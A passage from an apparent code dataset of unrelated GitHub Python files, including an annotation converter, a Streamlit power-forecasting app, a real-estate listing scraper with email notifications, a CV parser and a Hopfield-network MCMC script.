annotation_mode用于指定该文件运行时计算的内容\n# annotation_mode为0代表整个标签处理过程,包括获得VOCdevkit/VOC2007/ImageSets里面的txt以及训练用的train.txt、val.txt\n# annotation_mode为1代表获得VOCdevkit/VOC2007/ImageSets里面的txt\n# annotation_mode为2代表获得训练用的train.txt、val.txt\n#--------------------------------------------------------------------------------------------------------------------------------#\nannotation_mode = 2\n#-------------------------------------------------------------------#\n# 必须要修改,用于生成train.txt、val.txt的目标信息\n# 与训练和预测所用的classes_path一致即可\n# 如果生成的train.txt里面没有目标信息\n# 那么就是因为classes没有设定正确\n# 仅在annotation_mode为0和2的时候有效\n#-------------------------------------------------------------------#\nclasses_path = 'model_data//lane_classes.txt'\n#--------------------------------------------------------------------------------------------------------------------------------#\n# trainval_percent用于指定(训练集+验证集)与测试集的比例,默认情况下 (训练集+验证集):测试集 = 9:1 \n# train_percent用于指定(训练集+验证集)中训练集与验证集的比例,默认情况下 训练集:验证集 = 9:1 \n# 仅在annotation_mode为0和1的时候有效\n#--------------------------------------------------------------------------------------------------------------------------------#\ntrainval_percent = 0.9\ntrain_percent = 0.9\n\n\ndef convert_annotation(VOCdevkit_path, classes, image_id, image_set, list_file):\n in_file = open(os.path.join(VOCdevkit_path, '%s/bbox_annotations/%s.xml'%(image_set, image_id)), encoding='utf-8')\n tree=ET.parse(in_file)\n root = tree.getroot()\n\n # SA(Straight Arrow)\n # LA(Left Arrow)\n # RA(Right Arrow)\n # SLA(Straight-Left Arrow)\n # SRA(Straight-Right Arrow)\n # DM(Diamond)\n # PC(Pedestrian Crossing)\n # JB(Junction Box)\n # SL(Slow)\n # BL(Bus Lane)\n # CL(Cycle Lane)\n\n for obj in root.iter('object'):\n difficult = 0 \n if obj.find('difficult')!=None:\n difficult = obj.find('difficult').text\n cls = obj.find('name').text\n if cls not in classes or int(difficult)==1:\n continue\n cls_id = classes.index(cls)\n xmlbox = obj.find('bndbox')\n b = (int(float(xmlbox.find('xmin').text)), int(float(xmlbox.find('ymin').text)), int(float(xmlbox.find('xmax').text)), int(float(xmlbox.find('ymax').text)))\n list_file.write(\" \" + \",\".join([str(a) for a in b]) + ',' + str(cls_id))\n \ndef get_annotation(data_root):\n random.seed(0)\n #-------------------------------------------------------#\n # 指向VOC数据集所在的文件夹\n # 默认指向根目录下的VOC数据集\n #-------------------------------------------------------#\n VOCdevkit_path = os.path.join(data_root, \"LANEdevkit\")\n\n save_base = os.path.join(data_root, \"LANEdevkit\", \"Detection\")\n if not os.path.exists(save_base):\n os.makedirs(save_base)\n\n VOCdevkit_sets = [('train'), ('test')]\n classes, _ = get_classes(classes_path)\n \n if annotation_mode == 0 or annotation_mode == 2:\n print(\"Generate train.txt and val.txt for train.\")\n for image_set in VOCdevkit_sets: \n image_ids = glob(os.path.join(VOCdevkit_path, image_set, \"images/*.jpg\"))\n if image_set == \"test\":\n list_file = open('%s/Detection/%s.txt'%(VOCdevkit_path, \"val\"), 'w', encoding='utf-8')\n else:\n list_file = open('%s/Detection/%s.txt'%(VOCdevkit_path, image_set), 'w', encoding='utf-8')\n\n for image_id in image_ids:\n image_id = os.path.basename(image_id).split(\".\")[0]\n list_file.write('%s/%s/images/%s.jpg'%(os.path.abspath(VOCdevkit_path),image_set, image_id))\n convert_annotation(VOCdevkit_path, classes, image_id, image_set, list_file)\n list_file.write('\\n')\n list_file.close()\n\n print(\"Generate train.txt and val.txt for train done.\")\n\n\nif __name__ == \"__main__\":\n data_root = '/home/leyan/DataSet/'\n get_annotation(data_root)","repo_name":"Leyan529/pytorch-object-detection","sub_path":"annotation/lane.py","file_name":"lane.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"31357857532","text":"'''\nCreated on Aug 11, 2022\n\n@author: Billy Culver\n'''\nfrom scipy.optimize import minimize\nfrom Calculations.UnitDamage import CalcUnitDamage\nimport numpy as np\nimport matplotlib.pyplot as plt\ndef troop_count_con(xyz):\n x=xyz[0]\n y=xyz[1]\n z=xyz[2]\n return x+y+z-75\n\ndef total_damage(troop_counts,t1_boost,t2_boost,t3_boost,enemy_defense,full_troop_damage_boost,enemy_damage_reduction,t1_tpc,t2_tpc,t3_tpc,t1_min,t2_min,t3_min,t1_max,t2_max,t3_max):\n t1_damage=CalcUnitDamage(troop_counts[0]*t1_tpc, t1_tpc, minAttack=t1_min, MaxAttack=t1_max, Buffs=[t1_boost+full_troop_damage_boost], Debuffs=[enemy_damage_reduction], EnemyDefense=enemy_defense, damageType=\"Physical\", AttackRollType='Average')\n t2_damage=CalcUnitDamage(troop_counts[1]*t2_tpc, t2_tpc, minAttack=t2_min, MaxAttack=t2_max, Buffs=[t2_boost+full_troop_damage_boost], Debuffs=[enemy_damage_reduction], EnemyDefense=enemy_defense, damageType=\"Physical\", AttackRollType='Average')\n t3_damage=CalcUnitDamage(troop_counts[2]*t3_tpc, t3_tpc, minAttack=t3_min, MaxAttack=t3_max, Buffs=[t3_boost+full_troop_damage_boost], Debuffs=[enemy_damage_reduction], EnemyDefense=enemy_defense, damageType=\"Physical\", AttackRollType='Average')\n \n \n # print(\"T1:\",troop_counts[0],t1_damage)\n # print(\"T2:\",troop_counts[1],t2_damage)\n # print(\"T3:\",troop_counts[2],t3_damage)\n # print(\"DAMAGE:\",t1_damage+t2_damage+t3_damage)\n # print()\n \n return -(t1_damage+t2_damage+t3_damage)\nif __name__ == '__main__':\n \n \n enemy_defense=0\n enemy_damage_reduction=0.0\n full_troop_damage_boost=0.\n t1_boost=0\n t2_boost=0.4\n t3_boost=0.2\n \n t1_tpc=100\n t2_tpc=100\n t3_tpc=100\n \n t1_min=28\n t1_max=29\n \n t2_min=18\n t2_max=26\n \n t3_min=9\n t3_max=29\n \n \n \n def_ranges= range(0,150,1)\n t1s=[]\n t2s=[]\n t3s=[]\n \n \n \n for enemy_defense in def_ranges:\n const_args=(t1_boost,t2_boost,t3_boost, enemy_defense,full_troop_damage_boost,enemy_damage_reduction,t1_tpc,t2_tpc,t3_tpc,t1_min,t2_min,t3_min,t1_max,t2_max,t3_max)\n min_results=minimize(total_damage,x0=[25,25,25],args=const_args,constraints = {'type':'eq', 'fun': troop_count_con},bounds=[(0,75),(0,75),(0,75)])\n \n comm_counts=np.round(min_results.x)\n \n \n sm=np.sum(comm_counts)\n if(sm>75):\n comm_counts[np.argmax(comm_counts)]-=1\n elif(sm<75):\n comm_counts[np.argmin(comm_counts)]+=1\n \n sm=np.sum(np.round(comm_counts))\n print(comm_counts,sm)\n t1s.append(comm_counts[0])\n t2s.append(comm_counts[1])\n t3s.append(comm_counts[2])\n plt.plot(def_ranges,t1s,label='Sentinels')\n plt.plot(def_ranges,t2s,label='Sharpshooters')\n plt.plot(def_ranges,t3s,label='Master Throwers')\n plt.legend()\n plt.show()\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","repo_name":"billbo100/LOTR-RiseToWar-Simulator","sub_path":"quick_maximize.py","file_name":"quick_maximize.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"30719278517","text":"import datetime\nfrom sources.data_analysis import display_consumption_daily\nfrom sources.featuring import create_datetime_features\nfrom sources.data_getter import load_dataset\nfrom sources.featuring import add_consumption_average\nfrom prediction import test_prediction\nfrom sources.model import split\nfrom viems.my_data import my_data_with_another_feautures\nimport streamlit as st\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n#Formatage de la date\ndef process_date(date):\n if date.year > 2017:\n new_date = date.replace(year=2017)\n else:\n new_date = date\n return new_date\n\n#Combinaison de la date et l'heure\ndef combine_date_and_time(date, time):\n datetime_str = f\"{date} {time}\"\n return datetime_str \n\n#formate prediction \ndef prediction_model(predict):\n if len(predict)==0:\n return 0\n else:\n return predict[0]\n\n\ndef get_feature_and_predict():\n\n #Creation des données de test \n data= my_data_with_another_feautures()\n database_train, database_test=split(data, alpha=.8)\n #Get DateTime columns for prediction dataframe \n prediction=pd.DataFrame(database_test[\"DateTime\"])\n\n database_test.set_index(\"DateTime\",inplace=True)\n database_train.set_index(\"DateTime\",inplace=True)\n \n #Detection des tagets\n tag1=database_test[\"Zone 1 Power Consumption\"]\n tag2=database_test[\"Zone 2 Power Consumption\"]\n tag3=database_test[\"Zone 3 Power Consumption\"]\n \n \n database_test=add_consumption_average(database_test, rolling_hours=1)\n database_train=add_consumption_average(database_train, rolling_hours=1)\n\n #Reformatage de la colonne DayofWeek\n database_test['WeekOfYear'] = database_test['WeekOfYear'].astype(int)\n database_train['WeekOfYear'] = database_train['WeekOfYear'].astype(int)\n\n database_test.drop([\"Zone 1 Power Consumption\",\"Zone 2 Power Consumption\",\"Zone 3 Power Consumption\"],axis=1,inplace=True)\n database_train.drop([\"Zone 1 Power Consumption\",\"Zone 2 Power Consumption\",\"Zone 3 Power Consumption\"],axis=1,inplace=True)\n \n \n \n\n # Centrer le titre\n predict_value=[]\n choix_zone= \"ZONE 1\"\n choix =st.selectbox(\"ZONE DE CONSOMMATION\", [\"ABOMEY-CALAVI\", \"COTONOU\",\"PORTO-NOVO\"]) #Action de l'utilisateur\n #Encodage des zones \n if choix == \"ABOMEY-CALAVI\": \n choix_zone=\"ZONE 1\" \n elif choix == \"COTONOU\":\n choix_zone=\"ZONE 2\" \n else:\n choix_zone=\"ZONE 3\"\n \n\n # Demander à l'utilisateur de saisir une date entre la date minimale et la date maximale\n min_date = datetime.date(2023, 1, 1)\n selected_date = st.date_input(\"Sélectionnez une date\", min_value=min_date,)\n selected_date=process_date(selected_date)\n #Demande de l'heure \n default_time = datetime.time(0, 0)\n selected_time = st.time_input(\"Sélectionnez une heure\", step=600 ,value=default_time )\n \n # Bouton de prédiction\n if st.button(\"Prévision\"):\n columns=get_feature(database_test=database_test,database_train=database_train,selected_date=selected_date,selected_time=selected_time)\n predict_value=test_prediction(columns,taget_name=choix_zone)\n # Création des deux colonnes\n \n st.markdown(\n \"
\"\n \"

Prévision

\"\n f\"

ZONE: {choix}

\"\n f\"

DATE: {selected_date}

\"\n f\"

HEURE: {selected_time}

\"\n f\"

CONSOMMATION : {prediction_model(predict_value)} KW

\"\n \"
\",\n unsafe_allow_html=True\n )\n \n\n\n data = load_dataset(\"../Datasets/Tetuan_City_power_consumption.csv\")\n \n #ajouter denouvelle variable a la data (hour,dayofWeek,Month,Year,DayofYear,WeekOfYear)\n data=create_datetime_features(data)\n #Afficharge par de la consommation par moi\n data.reset_index(inplace=True)\n \n #Recherche ddu jour\n start_date = datetime.date(2017, 1, 1)\n delta = selected_date - start_date \n \n day_num = delta.days\n \n #Texte pour afficharge \n st.markdown(\"

{}

\".format(\"CONSOMMATION PAR INTERVALLE DE TEMPS\"), unsafe_allow_html=True)\n\n #Selction du nombre de jour\n df_sub_data = data[data[\"DayOfYear\"]==day_num]\n \n mask_zone = ['Zone 1 Power Consumption']\n\n fig, ax = plt.subplots(figsize=(15, 7))\n\n for zone in mask_zone:\n ax.plot(df_sub_data['DateTime'], df_sub_data[zone])\n\n ax.set_ylabel(\"Power consumption (KW)\")\n ax.set_xlabel(\"Date\")\n ax.set_title(\"Consommation journalière de la date de prévision\")\n\n st.pyplot(fig)\n \n \n\n\ndef get_feature(database_test,database_train,selected_date,selected_time,zone=1): \n database_test.reset_index(inplace=True)\n database_train.reset_index(inplace=True)\n data_for_col= database_test.loc[(database_test.DateTime == combine_date_and_time(selected_date,selected_time))]\n if data_for_col.shape[0]==0 :\n data_for_col= database_train.loc[(database_train.DateTime == combine_date_and_time(selected_date,selected_time))]\n if zone == 1: \n pass\n data_for_col.drop([\"DateTime\",\"Z2_Mean_Consumption_1H\",\"Z3_Mean_Consumption_1H\"],axis=1,inplace=True)\n return data_for_col\n \n \ndef plot_prediction(df_test, data, tag_name):\n data[\"predictions\"] = test_prediction(feeatures=df_test,taget_name= tag_name)\n fig, ax = plt.subplots()\n ax.plot(data[\"DateTime\"], data[\"predictions\"])\n ax.set_xlabel('Date de consommation')\n ax.set_ylabel('Quantité de consommation')\n ax.set_title('Graphique')\n # Affichage du graphique dans Streamlit\n st.pyplot(fig)\n \n\n \n\nif __name__ == \"__main__\":\n get_feature_and_predict()","repo_name":"oseeJacque/PowerForecast","sub_path":"viems/predictionview.py","file_name":"predictionview.py","file_ext":"py","file_size_in_byte":5925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"37332081304","text":"from typing import List\n\n\n\n\ndef get_requirements(file_path:str)-> List[str]:\n\n hepen_e_dot = \"-e .\"\n req_list=[]\n with open(file_path) as obj_file:\n requirements = obj_file.readlines()\n for req in requirements:\n requirements = req.replace(\"\\n\",\"\")\n print(requirements)\n req_list.append(requirements)\n # print(\"Requirement1 is\",req_list)\n\n\n if hepen_e_dot in req_list:\n req_list.remove(hepen_e_dot) \n # print(\"Requirement2 is\",req_list)\n return req_list \n\n\nget_requirements(\"requirements.txt\")","repo_name":"Prashulpoojary/my_project","sub_path":"check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"22367358534","text":"import csv\nimport os\nimport requests\nimport gspread\nimport pandas as pd\nimport smtplib\nfrom dotenv import load_dotenv\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom pathlib import Path\nfrom urllib.parse import urlparse, parse_qs, urlencode\n\nload_dotenv()\n\nCSV_HEAD_DEFAULT = [\n 'Listing ID',\n 'Listing Name',\n 'Final URL',\n 'Image URL',\n 'City name',\n 'Description',\n 'Price',\n 'Property type',\n 'Listing type',\n 'Contextual keywords',\n 'Address',\n 'Tracking template'\n]\n\n_headers = {\n 'Accept': 'application/json',\n 'Content-Type': 'application/json'\n}\n\nCWD = str(Path(__file__).parent.resolve()) + '/'\n\n\ndef extract_json_al(url, data={}, others={}, verify_ssl=True) -> dict:\n formatted = []\n json = None\n try:\n response = requests.request('GET', url=url, headers=_headers, params=data, verify=verify_ssl)\n generated_url = response.history[0].url if response.history else response.url\n print(f\"--> get data from : {generated_url}\")\n json = response.json()\n except requests.exceptions.HTTPError as e:\n print(e)\n print(f\"Unable to get data from {url}\")\n except Exception as e:\n print(e)\n print(f\"Unable to get data from {url}\")\n if not json:\n return {\n 'next': None,\n 'data': formatted\n }\n\n next_url = json['next'] if 'next' in json else None\n results = json['results'] if 'results' in json else []\n\n if not next_url and not results:\n print(json)\n\n parsed_url = urlparse(url)\n base_url = parsed_url.scheme + '://' + parsed_url.netloc\n url_queries = None\n if parsed_url.query:\n url_queries = parse_qs(parsed_url.query)\n\n search_type = data['search_type'] if 'search_type' in data else ''\n rent_min__gt = data['rent_min__gt'] if 'rent_min__gt' in data else ''\n\n if not search_type and url_queries:\n search_type = url_queries['search_type'][0] if 'search_type' in url_queries else ''\n if not rent_min__gt and url_queries:\n rent_min__gt = url_queries['rent_min__gt'][0] if 'rent_min__gt' in url_queries else ''\n\n if not search_type and others:\n search_type = others['search_type'] if 'search_type' in others else ''\n if not rent_min__gt and url_queries:\n rent_min__gt = others['rent_min__gt'] if 'rent_min__gt' in others else ''\n\n country = ''\n currency = ''\n\n if 'realestate.com.kh' in base_url:\n country = 'Cambodia'\n currency = 'USD'\n elif 'hausples.com.pg' in base_url:\n country = 'Papua New Guinea'\n currency = 'PGK'\n\n for row in results:\n try:\n if not row['images']:\n continue\n\n listing_type = row['listing_type']\n if search_type in ['sale', 'both'] and listing_type == 'rent':\n continue\n if search_type == 'rent':\n if (listing_type == 'sale' or listing_type == 'sale/rent'):\n continue\n if (rent_min__gt and int(row['rent_min']) <= int(rent_min__gt)):\n continue\n\n features = []\n if row['bedrooms']:\n features.append(f\"{row['bedrooms']} bed\")\n if row['bathrooms']:\n features.append(f\"{row['bathrooms']} bath\")\n headline = row['headline_en'].strip()\n if headline.startswith('\"') and headline.endswith('\"'):\n headline = headline[1:-1]\n description = ', '.join(features)\n image_url = row['images'][0]['url']\n price = row['price_min'] if row['listing_type'] in ['sale', 'sale/rent'] else row['rent_min']\n if price:\n price = f\"{price:,} {currency}\"\n\n listing = [\n row['id'],\n headline,\n base_url + row['url'],\n image_url,\n f\"{row['address_locality']}, {row['address_subdivision']}\",\n description,\n price,\n row['category_name'],\n listing_type,\n f\"{headline} for {listing_type} in {row['address_line_2']} ID {row['id']}\",\n f\"{row['address_locality']}, {row['address_subdivision']}, {country}\"\n ''\n ]\n formatted.append(listing)\n except Exception as e:\n print('--------------------- begin : error ---------------------')\n print(e)\n for k,v in row.items():\n if k not in [\n 'id',\n 'headline_en',\n 'url',\n 'listing_type',\n 'bedrooms',\n 'bathrooms',\n 'images',\n 'price_min',\n 'rent_min',\n 'address_locality',\n 'address_subdivision',\n 'category_name',\n 'address_line_2'\n ]:\n continue\n print(f\"{k} : {v}\")\n print('--------------------- end : error ---------------------')\n\n print(f\"...{len(formatted):,} data read\")\n\n return {\n 'next': next_url,\n 'data': formatted\n }\n\n\ndef extract_json_appr(url, data={}, others={}, verify_ssl=True) -> dict:\n formatted = []\n json = None\n try:\n response = requests.request('GET', url=url, headers=_headers, params=data, verify=verify_ssl)\n generated_url = response.history[0].url if response.history else response.url\n print(f\"--> get data from : {generated_url}\")\n json = response.json()\n except requests.exceptions.HTTPError as e:\n print(e)\n print(f\"Unable to get data from {url}\")\n except Exception as e:\n print(e)\n print(f\"Unable to get data from {url}\")\n if not json:\n return {\n 'next': None,\n 'data': formatted\n }\n\n parsed_url = urlparse(url)\n base_url = parsed_url.scheme + '://' + parsed_url.netloc\n url_queries = {}\n if parsed_url.query:\n url_queries = parse_qs(parsed_url.query)\n for k,v in url_queries.items():\n url_queries[k] = v[0]\n\n next_url = None\n last_page = json['last_page']\n page = url_queries['page'] if 'page' in url_queries else 1\n page = int(page)\n if page < int(last_page):\n page += 1\n url_queries['page'] = page\n url_params = urlencode(url_queries)\n next_url = f\"{base_url}{parsed_url.path}?{url_params}\"\n\n results = json['results'] if 'results' in json else []\n\n if not next_url and not results:\n print(json)\n\n country = ''\n currency = ''\n\n if 'realestate.com.kh' in base_url:\n country = 'Cambodia'\n currency = 'USD'\n elif 'hausples.com.pg' in base_url:\n country = 'Papua New Guinea'\n currency = 'PGK'\n\n for row in results:\n try:\n if not row['images']:\n continue\n\n listing_type = row['listing_type']\n headline = row['headline'].strip()\n if headline.startswith('\"') and headline.endswith('\"'):\n headline = headline[1:-1]\n description = headline\n image_url = row['images'][0]['url']\n price = row['display_price'] if listing_type in ['sale', 'sale/rent'] else row['display_rent']\n price = price.replace('K', '')\n\n listing = [\n row['id'],\n headline,\n base_url + row['url'],\n image_url,\n f\"{row['address']}\",\n description,\n f\"{price} {currency}\",\n row['category_name'],\n listing_type,\n f\"{row['title_img_alt']}\",\n f\"{row['address']}, {country}\"\n ''\n ]\n formatted.append(listing)\n except Exception as e:\n print('--------------------- begin : error ---------------------')\n print(e)\n for k,v in row.items():\n if k not in [\n 'id',\n 'headline_en',\n 'url',\n 'listing_type',\n 'bedrooms',\n 'bathrooms',\n 'images',\n 'price_min',\n 'rent_min',\n 'address_locality',\n 'address_subdivision',\n 'category_name',\n 'address_line_2'\n ]:\n continue\n print(f\"{k} : {v}\")\n print('--------------------- end : error ---------------------')\n\n print(f\"...{len(formatted):,} data read\")\n\n return {\n 'next': next_url,\n 'data': formatted\n }\n\n\ndef extract_json(url, data={}, others={}, verify_ssl=True) -> dict:\n if \"/api/portal/pages/results\" in url:\n return extract_json_appr(url, data, others, verify_ssl)\n return extract_json_al(url, data, others, verify_ssl)\n\n\ndef extract_json_detail_al(url, verify_ssl=True, fields=[]) -> dict:\n formatted = []\n json = None\n try:\n response = requests.request('GET', url=url, headers=_headers, verify=verify_ssl)\n generated_url = response.history[0].url if response.history else response.url\n print(f\"--> get data from : {generated_url}\")\n json = response.json()\n except requests.exceptions.HTTPError as e:\n print(e)\n print(f\"Unable to get data from {url}\")\n except Exception as e:\n print(e)\n print(f\"Unable to get data from {url}\")\n if not json:\n return {\n 'data': formatted\n }\n\n row = json\n\n if not json:\n print(row)\n\n parsed_url = urlparse(url)\n base_url = parsed_url.scheme + '://' + parsed_url.netloc\n\n country = ''\n currency = ''\n\n if 'realestate.com.kh' in base_url:\n country = 'Cambodia'\n currency = 'USD'\n elif 'hausples.com.pg' in base_url:\n country = 'Papua New Guinea'\n currency = 'PGK'\n\n try:\n listing_type = row['listing_type']\n\n features = []\n if row['bedrooms']:\n features.append(f\"{row['bedrooms']} bed\")\n if row['bathrooms']:\n features.append(f\"{row['bathrooms']} bath\")\n headline = row['headline_en'].strip()\n if headline.startswith('\"') and headline.endswith('\"'):\n headline = headline[1:-1]\n description = row['description_en']\n if features:\n description += ' -> Features : '\n description += ', '.join(features)\n image_url = row['images'][0]['url'] if row['images'] else ''\n price = row['price_min'] if row['listing_type'] in ['sale', 'sale/rent'] else row['rent_min']\n if price:\n price = f\"{price:,} {currency}\"\n\n is_project = len(row['nested']) > 0\n\n if fields:\n for f in fields:\n if f == 'id':\n formatted.append(row['id'])\n elif f == 'headline':\n formatted.append(headline)\n elif f == 'front_url':\n formatted.append(base_url + row['url'])\n elif f == 'image':\n formatted.append(image_url)\n elif f == 'description':\n formatted.append(description)\n elif f == 'price':\n formatted.append(price)\n elif f == 'category':\n formatted.append(row['category_name'])\n elif f == 'listing_type':\n formatted.append(listing_type)\n elif f == 'address':\n formatted.append(f\"{row['address_locality']}, {row['address_subdivision']}, {country}\")\n elif f == 'country':\n formatted.append(country)\n elif f == 'city':\n formatted.append(row['address_subdivision'])\n elif f == 'district':\n formatted.append(row['address_locality'])\n elif f == 'commune':\n formatted.append(row['address_line_2'])\n elif f == 'street_name':\n formatted.append(row['address_line_1'])\n elif f == 'latitude':\n formatted.append(row['address_latitude'])\n elif f == 'longitude':\n formatted.append(row['address_longitude'])\n elif f == 'back_url':\n id = row['id']\n path = 'projectlisting' if is_project else 'listing'\n formatted.append(f\"{base_url}/wagtail-admin/listings/{path}/edit/{id}/#tab-location\")\n else:\n formatted.append('-unknown key-')\n else:\n formatted = [\n row['id'],\n headline,\n base_url + row['url'],\n image_url,\n f\"{row['address_locality']}, {row['address_subdivision']}\",\n description,\n price,\n row['category_name'],\n listing_type,\n f\"{headline} for {listing_type} in {row['address_line_2']} ID {row['id']}\",\n f\"{row['address_locality']}, {row['address_subdivision']}, {country}\",\n is_project,\n ]\n except Exception as e:\n print('--------------------- begin : error ---------------------')\n print(e)\n print('--------------------- end : error ---------------------')\n\n return {\n 'data': formatted\n }\n\n\ndef write_to_csv(filename='exported/export.csv', csv_data=[], mode='w', csv_head=[]):\n with open(CWD + filename, mode, encoding='utf-8', newline='') as f:\n writer = csv.writer(f, delimiter=',', lineterminator='\\r\\n', quoting=csv.QUOTE_NONNUMERIC)\n if not csv_head:\n csv_head = CSV_HEAD_DEFAULT\n if mode == 'w':\n writer.writerow(csv_head)\n writer.writerows(csv_data)\n print(f\"...{len(csv_data):,} data writen\")\n\n\ndef init_google_spreadsheet(spreadsheet_name=''):\n try:\n google_spread = gspread.service_account(filename=CWD + 'google-service.json')\n return google_spread.open(spreadsheet_name)\n except Exception as e:\n print(f'Error : {e}')\n return None\n\n\ndef write_to_gsheet(spreadsheet, sheet_name='Feed1', csv_data=[], mode='w'):\n if not spreadsheet:\n print(\"Error : spreadsheet not initialized yet\")\n return\n\n try:\n worksheet = spreadsheet.worksheet(sheet_name)\n if mode == 'w':\n worksheet.clear()\n head_df = pd.DataFrame([CSV_HEAD_DEFAULT])\n worksheet.update(head_df.values.tolist())\n csv_df = pd.DataFrame(csv_data)\n worksheet.append_rows(csv_df.values.tolist())\n print(f\"...{len(csv_data):,} data writen\")\n except Exception as e:\n print(f'Error : {e}')\n\n\ndef send_mail_notif(title='', body=''):\n sender_address = os.getenv('MAIL_USERNAME')\n sender_pass = os.getenv('MAIL_PASSWORD')\n receiver_address = os.getenv('MAIL_TO').split(',')\n mail_host = os.getenv('MAIL_HOST')\n mail_port = os.getenv('MAIL_PORT')\n\n message = MIMEMultipart('alternative')\n message['From'] = sender_address\n message['To'] = ','.join(receiver_address)\n message['Subject'] = title\n message.attach(MIMEText(format_body_html(body), 'html'))\n\n session = smtplib.SMTP(mail_host, mail_port)\n session.ehlo()\n session.starttls()\n session.login(sender_address, sender_pass)\n session.sendmail(sender_address, receiver_address, message.as_string())\n session.quit()\n\n print('~~~~~~~~~Mail Sent~~~~~~~~~')\n\n\ndef format_body_html(body=''):\n return f' \\\n \\\n \\\n {body} \\\n '","repo_name":"ahmadharminto/python-export-json-to-csv","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":15914,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"4794123760","text":"import os\nimport json\nimport pandas as pd\n\ndef parse_cv(cv_text):\n cv = json.loads(cv_text)\n\n info_basique = cv[\"info_basique\"]\n nom_complet = info_basique[\"nom_complet\"]\n email = info_basique[\"email\"]\n linkedin_url = info_basique[\"linkedin_url\"]\n niveau_education = info_basique[\"niveau_education\"]\n université = info_basique[\"université\"]\n annee_de_diplomation = info_basique[\"annee_de_diplomation\"]\n\n experiences = cv[\"experience_professionnelle\"]\n postes = []\n for i in range(5): # Nous allons itérer 5 fois, car nous avons au maximum 5 expériences\n if i < len(experiences):\n exp = experiences[i]\n titre_du_poste = exp[\"titre_du_poste\"]\n entreprise = exp[\"entreprise\"]\n durée = exp[\"durée\"]\n postes.extend([titre_du_poste, entreprise, durée])\n else:\n postes.extend([None, None, None]) # Si nous n'avons pas d'expérience à cet indice, nous ajoutons None pour les trois valeurs\n\n return [nom_complet, email, linkedin_url, niveau_education, université, annee_de_diplomation, *postes]\n\ndata = []\n\ndirectory = 'CV_parsed'\nfor filename in os.listdir(directory):\n if filename.endswith(\".txt\"):\n with open(os.path.join(directory, filename), 'r') as file:\n cv_text = file.read()\n filename_without_extension = os.path.splitext(filename)[0]\n data.append([filename_without_extension] + parse_cv(cv_text)) # Nous ajoutons le nom du fichier au début de chaque ligne\n\ndf = pd.DataFrame(data, columns=[\"nom_fichier\", \"nom_complet\", \"email\", \"linkedin_url\", \"niveau_education\", \"université\", \"annee_de_diplomation\", \n \"poste 1\", \"entreprise 1\", \"durée 1\", \n \"poste 2\", \"entreprise 2\", \"durée 2\", \n \"poste 3\", \"entreprise 3\", \"durée 3\", \n \"poste 4\", \"entreprise 4\", \"durée 4\", \n \"poste 5\", \"entreprise 5\", \"durée 5\"])\n\nprint(os.getcwd())\ndf.to_excel(\"cvs.xlsx\", index=False)\n\n","repo_name":"hmikkos/resume-semantic-search","sub_path":"TableConstructor.py","file_name":"TableConstructor.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"72810385645","text":"from cPickle import dump, load\nfrom matplotlib.pyplot import plot, show, legend\nfrom numpy import zeros, fill_diagonal, asarray, arange, sqrt, linspace\nimport numpy\nfrom numpy.random import rand, randn, randint\nimport time\n\nfrom kameleon_mcmc.distribution.Hopfield import Hopfield\nfrom kameleon_mcmc.distribution.full_conditionals.HopfieldFullConditionals import HopfieldFullConditionals\nfrom kameleon_mcmc.kernel.HypercubeKernel import HypercubeKernel\nfrom kameleon_mcmc.mcmc.MCMCChain import MCMCChain\nfrom kameleon_mcmc.mcmc.MCMCParams import MCMCParams\nfrom kameleon_mcmc.mcmc.output.StatisticsOutput import StatisticsOutput\nfrom kameleon_mcmc.mcmc.samplers.DiscreteKameleon import DiscreteKameleon\nfrom kameleon_mcmc.mcmc.samplers.Gibbs import Gibbs\nfrom kameleon_mcmc.mcmc.samplers.StandardMetropolisDiscrete import StandardMetropolisDiscrete\n\n\ndef create_ground_truth():\n filename_chain = \"chain.bin\"\n filename_Z = \"Z.bin\"\n filename_hopfield = \"hopfield.bin\"\n \n try:\n f = open(filename_Z, \"r\")\n Z = load(f)\n f.close()\n \n f = open(filename_hopfield, \"r\")\n hopfield = load(f)\n f.close()\n print(\"Loaded existing ground truth samples and hopfield netword.\")\n except IOError:\n print(\"No existing ground truth samples. Creating.\")\n \n # the network to sample from\n try:\n f = open(filename_hopfield, \"r\")\n hopfield = load(f)\n f.close()\n d = hopfield.dimension\n print(\"Loaded hopfield network\")\n except IOError:\n d = 50\n b = randn(d)\n V = randn(d, d)\n W = V + V.T\n fill_diagonal(W, zeros(d))\n hopfield = Hopfield(W, b)\n \n # dump hopfield network\n f = open(filename_hopfield, \"w\")\n dump(hopfield, f)\n f.close()\n \n # iterations\n num_iterations = 10000000\n warm_up = 100000\n thin = 2000\n \n current_state = [rand() < 0.5 for _ in range(d)]\n distribution = HopfieldFullConditionals(full_target=hopfield,\n current_state=current_state,\n schedule=\"random_permutation\")\n mcmc_sampler = Gibbs(distribution)\n# spread = .0001\n# mcmc_sampler = StandardMetropolisDiscrete(hopfield, spread)\n \n mcmc_params = MCMCParams(start=asarray(current_state, dtype=numpy.bool8), num_iterations=num_iterations)\n chain = MCMCChain(mcmc_sampler, mcmc_params)\n \n chain.append_mcmc_output(StatisticsOutput(plot_times=True, lag=1000))\n # chain.append_mcmc_output(StoreChainOutput(\".\", lag=100000))\n \n # chain.append_mcmc_output(DiscretePlottingOutput(plot_from=0, lag=100))\n chain.run()\n \n # dump chain\n try:\n f = open(filename_chain, \"w\")\n dump(chain, f)\n f.close()\n except IOError:\n print(\"Could not save MCMC chain\")\n \n # warmup and thin\n Z = chain.samples[(warm_up):]\n Z = Z[arange(len(Z), step=thin)]\n Z = Z.astype(numpy.bool8)\n \n # 